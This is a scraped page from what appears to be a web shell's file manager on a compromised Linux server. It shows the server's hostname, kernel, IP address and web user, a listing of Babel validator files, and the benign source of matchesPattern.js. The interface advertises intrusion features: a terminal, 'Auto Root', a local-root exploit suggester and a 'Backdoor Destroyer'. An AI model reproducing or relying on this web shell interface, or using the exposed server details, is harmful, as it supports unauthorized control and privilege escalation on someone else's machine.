Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.216.250
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
nodejs /
@babel /
types /
lib /
validators /
Delete
Unzip
Name
Size
Permission
Date
Action
generated
[ DIR ]
drwxr-xr-x
2024-07-10 10:56
react
[ DIR ]
drwxr-xr-x
2024-07-10 10:56
buildMatchMemberExpression.js
406
B
-rw-r--r--
2024-02-26 08:46
is.js
772
B
-rw-r--r--
2024-02-26 08:46
isBinding.js
777
B
-rw-r--r--
2024-02-26 08:46
isBlockScoped.js
390
B
-rw-r--r--
2024-02-26 08:46
isImmutable.js
483
B
-rw-r--r--
2024-02-26 08:46
isLet.js
367
B
-rw-r--r--
2024-02-26 08:46
isNode.js
273
B
-rw-r--r--
2024-02-26 08:46
isNodesEquivalent.js
1.46
KB
-rw-r--r--
2024-02-26 08:46
isPlaceholderType.js
512
B
-rw-r--r--
2024-02-26 08:46
isReferenced.js
2.54
KB
-rw-r--r--
2024-02-26 08:46
isScope.js
557
B
-rw-r--r--
2024-02-26 08:46
isSpecifierDefault.js
413
B
-rw-r--r--
2024-02-26 08:46
isType.js
561
B
-rw-r--r--
2024-02-26 08:46
isValidES3Identifier.js
646
B
-rw-r--r--
2024-02-26 08:46
isValidIdentifier.js
584
B
-rw-r--r--
2024-02-26 08:46
isVar.js
366
B
-rw-r--r--
2024-02-26 08:46
matchesPattern.js
1.09
KB
-rw-r--r--
2024-02-26 08:46
validate.js
877
B
-rw-r--r--
2024-02-26 08:46
Save
Rename
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); exports.default = matchesPattern; var _generated = require("./generated"); function matchesPattern(member, match, allowPartial) { if (!(0, _generated.isMemberExpression)(member)) return false; const parts = Array.isArray(match) ? match : match.split("."); const nodes = []; let node; for (node = member; (0, _generated.isMemberExpression)(node); node = node.object) { nodes.push(node.property); } nodes.push(node); if (nodes.length < parts.length) return false; if (!allowPartial && nodes.length > parts.length) return false; for (let i = 0, j = nodes.length - 1; i < parts.length; i++, j--) { const node = nodes[j]; let value; if ((0, _generated.isIdentifier)(node)) { value = node.name; } else if ((0, _generated.isStringLiteral)(node)) { value = node.value; } else if ((0, _generated.isThisExpression)(node)) { value = "this"; } else { return false; } if (parts[i] !== value) return false; } return true; } //# sourceMappingURL=matchesPattern.js.map